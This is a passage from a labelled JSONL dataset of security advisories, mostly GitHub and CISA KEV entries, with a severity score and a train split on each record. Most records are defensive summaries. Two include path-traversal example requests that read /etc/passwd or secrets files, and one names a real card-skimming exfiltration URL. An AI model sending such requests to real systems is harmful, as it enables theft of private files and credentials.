"github_advisory", "timestamp": "2018-10-16", "split": "train"} -{"id": "60d07986effc62cc26ef", "text": "SolarWinds Virtualization Manager Privilege Escalation Vulnerability\n\nAffected: SolarWinds Virtualization Manager\n\nSolarWinds Virtualization Manager allows for privilege escalation through leveraging a misconfiguration of sudo.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-264\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "SolarWinds Virtualization Manager Privilege Escalation Vulnerability\n\nAffected: SolarWinds Virtualization Manager\n\nSolarWinds Virtualization Manager allows for privilege escalation through leveraging a misconfiguration of sudo.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-264\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "516410e8f8e0a50170c9", "text": "Possible privilege escalation in org.springframework:spring-core\n\nSpring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, provide client-side support for multipart requests. When Spring MVC or Spring WebFlux server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could to lead privilege escalation, for example, if the part content represents a username or user roles.", "text_raw": "Possible privilege escalation in org.springframework:spring-core\n\n[Severity: HIGH]\n\nSpring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, provide client-side support for multipart requests. When Spring MVC or Spring WebFlux server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could to lead privilege escalation, for example, if the part content represents a username or user roles.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "262e99bb96add93da738", "text": "Cross-Site Request Forgery in ForkCMS\n\nMultiple cross-site request forgery (CSRF) vulnerabilities in the Admin Console in Fork before 5.8.3 allows remote attackers to perform unauthorized actions as administrator to (1) approve the mass of the user's comments, (2) restoring a deleted user, (3) installing or running modules, (4) resetting the analytics, (5) pinging the mailmotor api, (6) uploading things to the media library, (7) exporting locale.", "text_raw": "Cross-Site Request Forgery in ForkCMS\n\n[Severity: HIGH]\n\nMultiple cross-site request forgery (CSRF) vulnerabilities in the Admin Console in Fork before 5.8.3 allows remote attackers to perform unauthorized actions as administrator to (1) approve the mass of the user's comments, (2) restoring a deleted user, (3) installing or running modules, (4) resetting the analytics, (5) pinging the mailmotor api, (6) uploading things to the media library, (7) exporting locale.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-06", "split": "train"} -{"id": "62cb5b80a476c4f21a7a", "text": "Prototype Pollution in gedi\n\nAll versions of package gedi up to and including version 1.6.3 are vulnerable to Prototype Pollution via the set function.", "text_raw": "Prototype Pollution in gedi\n\n[Severity: CRITICAL]\n\nAll versions of package gedi up to and including version 1.6.3 are vulnerable to Prototype Pollution via the set function.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-05-06", "split": "train"} -{"id": "de5d042250293a972bed", "text": "Django open redirect\n\nA maliciously crafted URL to a Django (1.10 before 1.10.7, 1.9 before 1.9.13, and 1.8 before 1.8.18) site using the `django.views.static.serve()` view could redirect to any other domain, aka an open redirect vulnerability.", "text_raw": "Django open redirect\n\n[Severity: MEDIUM]\n\nA maliciously crafted URL to a Django (1.10 before 1.10.7, 1.9 before 1.9.13, and 1.8 before 1.8.18) site using the `django.views.static.serve()` view could redirect to any other domain, aka an open redirect vulnerability.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-01-04", "split": "train"} -{"id": "17fda54a553c0c50e6cc", "text": "Malicious Package in regenraotr\n\nAll versions of `regenraotr` are considered malicious. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When executed, the package calls home to a Command and Control server to execute arbitrary commands.\n\n## Recommendation\n\nThis package was published to the npm Registry for a very short period of time. If you happen to find it in your environment you should revoke and rotate all credentials found on the compromised machine, as well as completely erase the affected machine and reinstall your Operating System.", "text_raw": "Malicious Package in regenraotr\n\n[Severity: CRITICAL]\n\nAll versions of `regenraotr` are considered malicious. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When executed, the package calls home to a Command and Control server to execute arbitrary commands.\n\n\n## Recommendation\n\nThis package was published to the npm Registry for a very short period of time. If you happen to find it in your environment you should revoke and rotate all credentials found on the compromised machine, as well as completely erase the affected machine and reinstall your Operating System.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "6b2f535ccd8aa527b5c6", "text": "Log Forging in generator-jhipster-kotlin\n\n### Impact\n\nWe log the mail for invalid password reset attempts. \nAs the email is provided by a user and the api is public this can be used by an attacker to forge log entries.\nThis is vulnerable to https://cwe.mitre.org/data/definitions/117.html\n\nThis problem affects only application generated with jwt or session authentication. Applications using oauth are not vulnerable.\n\n### Patches\n\nversion 1.7.0.\n\n### Workarounds\n\nIn `AccountResource.kt` you should change the line\n\n```kotlin\n log.warn(\"Password reset requested for non existing mail '$mail'\");\n```\n\nto\n\n```kotlin\n log.warn(\"Password reset requested for non existing mail\");\n```\n\n### References\n\n* https://cwe.mitre.org/data/definitions/117.html\n* https://owasp.org/www-community/attacks/Log_Injection\n* https://www.baeldung.com/jvm-log-forging\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [jhipster kotlin](https://github.com/jhipster/jhipster-kotlin)", "text_raw": "Log Forging in generator-jhipster-kotlin\n\n[Severity: MEDIUM]\n\n### Impact\n\nWe log the mail for invalid password reset attempts. \nAs the email is provided by a user and the api is public this can be used by an attacker to forge log entries.\nThis is vulnerable to https://cwe.mitre.org/data/definitions/117.html\n\nThis problem affects only application generated with jwt or session authentication. Applications using oauth are not vulnerable.\n\n### Patches\n\nversion 1.7.0.\n\n### Workarounds\n\nIn `AccountResource.kt` you should change the line\n\n```kotlin\n log.warn(\"Password reset requested for non existing mail '$mail'\");\n```\n\nto \n\n```kotlin\n log.warn(\"Password reset requested for non existing mail\");\n```\n\n### References\n\n* https://cwe.mitre.org/data/definitions/117.html\n* https://owasp.org/www-community/attacks/Log_Injection\n* https://www.baeldung.com/jvm-log-forging\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [jhipster kotlin](https://github.com/jhipster/jhipster-kotlin)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-06-25", "split": "train"} -{"id": "b461d94120c5cbeb6613", "text": "ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC", "text_raw": "ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2009-05-08", "split": "train"} -{"id": "fe95737a0ca3d3f46fa8", "text": "Malicious Package in jqeury\n\nVersion 3.3.1 of `jqeury` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opened a backdoor.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in jqeury\n\n[Severity: CRITICAL]\n\nVersion 3.3.1 of `jqeury` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opened a backdoor.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "5049fa4d57474459751a", "text": "Cross-site Scripting (XSS) in baserCMS\n\nImproper neutralization of JavaScript input in the page editing function of baserCMS versions prior to 4.4.5 allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.", "text_raw": "Cross-site Scripting (XSS) in baserCMS\n\n[Severity: MEDIUM]\n\nImproper neutralization of JavaScript input in the page editing function of baserCMS versions prior to 4.4.5 allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-08", "split": "train"} -{"id": "061afbd238322c945743", "text": "Cross Site Scripting (XSS) in plotly.js\n\nAffected versions of `plotly.js` are vulnerable to cross-site scripting if an attacker can convince a user to visit a malicious plot on a site using this package.\n\n## Recommendation\n\nUpdate to 1.16.0 or later.", "text_raw": "Cross Site Scripting (XSS) in plotly.js\n\n[Severity: MEDIUM]\n\nAffected versions of `plotly.js` are vulnerable to cross-site scripting if an attacker can convince a user to visit a malicious plot on a site using this package.\n\n\n## Recommendation\n\nUpdate to 1.16.0 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "ae706bc80b04c676b5cd", "text": "Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities", "text_raw": "Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2012-03-10", "split": "train"} -{"id": "c7350d8953799eb1b09a", "text": "Cross-site Scripting in kimai2\n\nkimai2 is vulnerable to Cross-Site Request Forgery (CSRF) in deleting invoice templates. This vulnerability is capable of tricking admin user to delete invoice templates.", "text_raw": "Cross-site Scripting in kimai2\n\n[Severity: MEDIUM]\n\nkimai2 is vulnerable to Cross-Site Request Forgery (CSRF) in deleting invoice templates. This vulnerability is capable of tricking admin user to delete invoice templates.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-23", "split": "train"} -{"id": "34919ff4109f5fea4148", "text": "Malicious Package in tensorplow\n\nAll versions of `tensorplow` contain malicious code as a preinstall script. When installed, the package calls home to a Command and Control server to execute arbitrary commands.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in tensorplow\n\n[Severity: CRITICAL]\n\nAll versions of `tensorplow` contain malicious code as a preinstall script. When installed, the package calls home to a Command and Control server to execute arbitrary commands.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "3fec2479bc8134967800", "text": "XWiki users registered with email verification can self re-activate their disabled accounts\n\n### Impact\nA user disabled on a wiki using email verification for registration can re-activate himself by using the activation link provided for his registration.\n\n### Patches\nThe problem has been patched in the following versions of XWiki: 11.10.13, 12.6.7, 12.10.2, 13.0.\n\n### Workarounds\nIt's possible to workaround the issue by resetting the `validkey` property of the disabled XWiki users. This can be done by editing the user profile with object editor.\n\n### References\nhttps://jira.xwiki.org/browse/XWIKI-17942\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira](http://jira.xwiki.org)\n* Email us at [Security mailing-list](mailto:security@xwiki.org)", "text_raw": "XWiki users registered with email verification can self re-activate their disabled accounts\n\n[Severity: HIGH]\n\n### Impact\nA user disabled on a wiki using email verification for registration can re-activate himself by using the activation link provided for his registration. \n\n### Patches\nThe problem has been patched in the following versions of XWiki: 11.10.13, 12.6.7, 12.10.2, 13.0.\n\n### Workarounds\nIt's possible to workaround the issue by resetting the `validkey` property of the disabled XWiki users. This can be done by editing the user profile with object editor.\n\n### References\nhttps://jira.xwiki.org/browse/XWIKI-17942\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Jira](http://jira.xwiki.org)\n* Email us at [Security mailing-list](mailto:security@xwiki.org)\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "25545688e7be0b34d43b", "text": "HTML Injection in preact\n\nVersions of `preact` 10.x on prerelease tags alpha and beta prior to 10.0.0-beta.1 are vulnerable to HTML Injection. Due to insufficient input validation the package allows attackers to inject JavaScript objects as virtual-dom nodes, which may lead to Cross-Site Scripting. This requires user input parsed with `JSON.parse()` to be passed directly into JSX without sanitization.\n\n## Recommendation\n\nUpgrade to version 10.0.0-beta.1.", "text_raw": "HTML Injection in preact\n\n[Severity: MEDIUM]\n\nVersions of `preact` 10.x on prerelease tags alpha and beta prior to 10.0.0-beta.1 are vulnerable to HTML Injection. Due to insufficient input validation the package allows attackers to inject JavaScript objects as virtual-dom nodes, which may lead to Cross-Site Scripting. This requires user input parsed with `JSON.parse()` to be passed directly into JSX without sanitization.\n\n\n## Recommendation\n\nUpgrade to version 10.0.0-beta.1.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "89667ced300fb35b1996", "text": "Prototype Pollution in merge\n\nVersions of `merge` before 1.2.1 are vulnerable to prototype pollution. The `merge.recursive` function can be tricked into adding or modifying properties of the Object prototype.\n\n## Recommendation\n\nUpdate to version 1.2.1 or later.", "text_raw": "Prototype Pollution in merge\n\n[Severity: HIGH]\n\nVersions of `merge` before 1.2.1 are vulnerable to prototype pollution. The `merge.recursive` function can be tricked into adding or modifying properties of the Object prototype.\n\n\n## Recommendation\n\nUpdate to version 1.2.1 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-11-01", "split": "train"} -{"id": "b7f50fc912fbf0eca64f", "text": "iManager Plugin v1.2.8 (lang) Local File Inclusion Vulnerability", "text_raw": "iManager Plugin v1.2.8 (lang) Local File Inclusion Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2011-09-16", "split": "train"} -{"id": "b380f223996916948b30", "text": "Apache CXF TLS hostname verification does not work correctly with com.sun.net.ssl.*\n\nIt is possible to configure Apache CXF to use the com.sun.net.ssl implementation via 'System.setProperty(\"java.protocol.handler.pkgs\", \"com.sun.net.ssl.internal.www.protocol\");'. When this system property is set, CXF uses some reflection to try to make the HostnameVerifier work with the old com.sun.net.ssl.HostnameVerifier interface. However, the default HostnameVerifier implementation in CXF does not implement the method in this interface, and an exception is thrown. However, in Apache CXF prior to 3.2.5 and 3.1.16 the exception is caught in the reflection code and not properly propagated. What this means is that if you are using the com.sun.net.ssl stack with CXF, an error with TLS hostname verification will not be thrown, leaving a CXF client subject to man-in-the-middle attacks.", "text_raw": "Apache CXF TLS hostname verification does not work correctly with com.sun.net.ssl.*\n\n[Severity: HIGH]\n\nIt is possible to configure Apache CXF to use the com.sun.net.ssl implementation via 'System.setProperty(\"java.protocol.handler.pkgs\", \"com.sun.net.ssl.internal.www.protocol\");'. When this system property is set, CXF uses some reflection to try to make the HostnameVerifier work with the old com.sun.net.ssl.HostnameVerifier interface. However, the default HostnameVerifier implementation in CXF does not implement the method in this interface, and an exception is thrown. However, in Apache CXF prior to 3.2.5 and 3.1.16 the exception is caught in the reflection code and not properly propagated. What this means is that if you are using the com.sun.net.ssl stack with CXF, an error with TLS hostname verification will not be thrown, leaving a CXF client subject to man-in-the-middle attacks.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-19", "split": "train"} -{"id": "f8afca607a7b054017f8", "text": "Apple iOS WebKit Memory Corruption Vulnerability\n\nAffected: Apple iOS\n\nApple iOS WebKit contains a memory corruption vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Apple iOS WebKit Memory Corruption Vulnerability\n\nAffected: Apple iOS\n\nApple iOS WebKit contains a memory corruption vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "ac2a749d256bc1196167", "text": "Malicious Package in grunt-radical\n\nVersion 0.0.14 of `grunt-radical` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n## Recommendation\n\nRemove the package from your environment and evaluate your application to determine whether or not user data was compromised.", "text_raw": "Malicious Package in grunt-radical\n\n[Severity: CRITICAL]\n\nVersion 0.0.14 of `grunt-radical` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n\n\n## Recommendation\n\nRemove the package from your environment and evaluate your application to determine whether or not user data was compromised.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-11", "split": "train"} -{"id": "9b54a8a150f38d33cf0c", "text": "XSS in knockout\n\nThere is a vulnerability in knockout before version 3.5.0-beta, where after escaping the context of the web application, the web application delivers data to its users along with other trusted dynamic content, without validating it.", "text_raw": "XSS in knockout\n\n[Severity: MEDIUM]\n\nThere is a vulnerability in knockout before version 3.5.0-beta, where after escaping the context of the web application, the web application delivers data to its users along with other trusted dynamic content, without validating it.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-04-01", "split": "train"} -{"id": "d1fa941025fdbb02bd9e", "text": "Cross-site Scripting in Mermaid\n\nMermaid before 8.11.0 allows XSS when the antiscript feature is used.", "text_raw": "Cross-site Scripting in Mermaid\n\n[Severity: MEDIUM]\n\nMermaid before 8.11.0 allows XSS when the antiscript feature is used.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-12-10", "split": "train"} -{"id": "4c59ad938c075acbdb57", "text": "Downloads Resources over HTTP in massif\n\nAffected versions of `massif` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `massif`.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability, and the package has not seen an update since 2013.\n\nThe best mitigation is currently to avoid using this package, using a different package if available.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "text_raw": "Downloads Resources over HTTP in massif\n\n[Severity: HIGH]\n\nAffected versions of `massif` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `massif`.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability, and the package has not seen an update since 2013.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "a2463a07ee76d68ec687", "text": "Prototype Pollution in @hapi/hoek\n\nVersions of `@hapi/hoek` prior to 8.5.1 and 9.0.3 are vulnerable to Prototype Pollution. The `clone` function fails to prevent the modification of the Object prototype when passed specially-crafted input. Attackers may use this to change existing properties that exist in all objects, which may lead to Denial of Service or Remote Code Execution in specific circumstances. \nThis issue __does not__ affect hapi applications since the framework protects against such malicious inputs. Applications that use `@hapi/hoek` outside of the hapi ecosystem may be vulnerable.\n\n## Recommendation\n\nUpdate to version 8.5.1, 9.0.3 or later.", "text_raw": "Prototype Pollution in @hapi/hoek\n\n[Severity: LOW]\n\nVersions of `@hapi/hoek` prior to 8.5.1 and 9.0.3 are vulnerable to Prototype Pollution. The `clone` function fails to prevent the modification of the Object prototype when passed specially-crafted input. Attackers may use this to change existing properties that exist in all objects, which may lead to Denial of Service or Remote Code Execution in specific circumstances. \nThis issue __does not__ affect hapi applications since the framework protects against such malicious inputs. Applications that use `@hapi/hoek` outside of the hapi ecosystem may be vulnerable.\n\n\n## Recommendation\n\nUpdate to version 8.5.1, 9.0.3 or later.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "baf44f5cb1817641c5ba", "text": "Cross-Site Scripting in fomantic-ui\n\nVersions of `fomantic-ui` are vulnerable to Cross-Site Scripting. Lack of output encoding on the selection dropdowns can lead to user input being executed instead of printed as text.\n\n## Recommendation\n\nUpgrade to version 2.7.0 or later.", "text_raw": "Cross-Site Scripting in fomantic-ui\n\n[Severity: HIGH]\n\nVersions of `fomantic-ui` are vulnerable to Cross-Site Scripting. Lack of output encoding on the selection dropdowns can lead to user input being executed instead of printed as text.\n\n\n## Recommendation\n\nUpgrade to version 2.7.0 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-02", "split": "train"} -{"id": "8825c3e9c15d1938afef", "text": "Ratpack's default client side session signing key is highly predictable\n\n### Impact\n\nThe client side session module uses the application startup time as the signing key by default. This means that if an attacker can determine this time, and if encryption is not also used (which is recommended, but is not on by default), the session data could be tampered with by someone with the ability to write cookies.\n\nThe default configuration is unsuitable for production use as an application restart renders all sessions invalid and is not multi-host compatible, but its use is not actively prevented.\n\n### Vulnerability Location\n\nhttps://github.com/ratpack/ratpack/blob/29434f7ac6fd4b36a4495429b70f4c8163100332/ratpack-session/src/main/java/ratpack/session/clientside/ClientSideSessionConfig.java#L29\n\n### Patches\n\nAs of Ratpack 1.9.0 the default value is a securely randomly generated value, generated at application startup time.\n\n### Workarounds\n\nSupply an alternative signing key, as per the documentation's recommendation.", "text_raw": "Ratpack's default client side session signing key is highly predictable\n\n[Severity: MEDIUM]\n\n### Impact\n\nThe client side session module uses the application startup time as the signing key by default. This means that if an attacker can determine this time, and if encryption is not also used (which is recommended, but is not on by default), the session data could be tampered with by someone with the ability to write cookies. \n\nThe default configuration is unsuitable for production use as an application restart renders all sessions invalid and is not multi-host compatible, but its use is not actively prevented.\n\n### Vulnerability Location\n\nhttps://github.com/ratpack/ratpack/blob/29434f7ac6fd4b36a4495429b70f4c8163100332/ratpack-session/src/main/java/ratpack/session/clientside/ClientSideSessionConfig.java#L29\n\n### Patches\n\nAs of Ratpack 1.9.0 the default value is a securely randomly generated value, generated at application startup time. \n\n### Workarounds\n\nSupply an alternative signing key, as per the documentation's recommendation.\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-07-01", "split": "train"} -{"id": "8a3c31be7c7506b934fe", "text": "Missing Origin Validation in parcel-bundler\n\nWithdrawn: Duplicate of GHSA-37q6-576q-vgr7", "text_raw": "Missing Origin Validation in parcel-bundler\n\n[Severity: MEDIUM]\n\nWithdrawn: Duplicate of GHSA-37q6-576q-vgr7", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-08-27", "split": "train"} -{"id": "2fa3af152d965280e316", "text": "Reachable Assertion in OpenCV.\n\nIn OpenCV 3.3.1 (corresponds with OpenCV-Python 3.3.1.11), an assertion failure happens in cv::RBaseStream::setPos in modules/imgcodecs/src/bitstrm.cpp because of an incorrect integer cast.", "text_raw": "Reachable Assertion in OpenCV.\n\n[Severity: MEDIUM]\n\nIn OpenCV 3.3.1 (corresponds with OpenCV-Python 3.3.1.11), an assertion failure happens in cv::RBaseStream::setPos in modules/imgcodecs/src/bitstrm.cpp because of an incorrect integer cast.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "e0c3f6ea25cd92795636", "text": "LimeSurvey v2.00+ (build 131107) Script Insertion And SQL Injection Vulnerability", "text_raw": "LimeSurvey v2.00+ (build 131107) Script Insertion And SQL Injection Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2013-11-23", "split": "train"} -{"id": "e384527cebfb7040edd9", "text": "Directory Traversal in susu-sum\n\nAffected versions of `susu-sum` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in susu-sum\n\n[Severity: HIGH]\n\nAffected versions of `susu-sum` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "dd46f811acb191397d30", "text": "openssl-src NULL pointer Dereference in signature_algorithms processing\n\nAn OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", "text_raw": "openssl-src NULL pointer Dereference in signature_algorithms processing\n\n[Severity: MEDIUM]\n\nAn OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "7ba53efb4298bccdde5c", "text": "Directory Traversal in elding\n\nAffected versions of `elding` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\nThis vulnerability only affects files that have file extensions - i.e. `/etc/passwd` will be treated as a directory, and a read attempt on `/etc/passwd/index.js` will be made and subsequently fail.\n\n**Example request:**\n```http\nGET /../../../../../../../../../../some_app_dir/secrets.json HTTP/1.1\nhost:foo\n```\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "text_raw": "Directory Traversal in elding\n\n[Severity: MEDIUM]\n\nAffected versions of `elding` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.\n\nThis vulnerability only affects files that have file extensions - i.e. `/etc/passwd` will be treated as a directory, and a read attempt on `/etc/passwd/index.js` will be made and subsequently fail. \n\n**Example request:**\n```http\nGET /../../../../../../../../../../some_app_dir/secrets.json HTTP/1.1\nhost:foo\n```\n\n\n## Recommendation\n\nNo patch is available for this vulnerability.\n\nIt is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-08-06", "split": "train"} -{"id": "1d7385fd0d3aada1cdb8", "text": "Command Injection in expressfs\n\nAll versions of `expressfs` are vulnerable to Command Injection. The package does not validate user input on several API endpoints, allowing attackers to run arbitrary commands in the system. The affected endpoints are: `expressfs.appendFile`, `expressfs.cp`, `expressfs.create` and `expressfs.rmdir`.\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module until a fix is made available.", "text_raw": "Command Injection in expressfs\n\n[Severity: HIGH]\n\nAll versions of `expressfs` are vulnerable to Command Injection. The package does not validate user input on several API endpoints, allowing attackers to run arbitrary commands in the system. The affected endpoints are: `expressfs.appendFile`, `expressfs.cp`, `expressfs.create` and `expressfs.rmdir`.\n\n\n## Recommendation\n\nNo fix is currently available. Consider using an alternative module until a fix is made available.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "2f908638c8fb7b7ab869", "text": "Denial-of-Service Extended Event Loop Blocking in qs\n\nVersions prior to 1.0.0 of `qs` are affected by a denial of service vulnerability that results from excessive recursion in parsing a deeply nested JSON string.\n\n## Recommendation\n\nUpdate to version 1.0.0 or later", "text_raw": "Denial-of-Service Extended Event Loop Blocking in qs\n\n[Severity: HIGH]\n\nVersions prior to 1.0.0 of 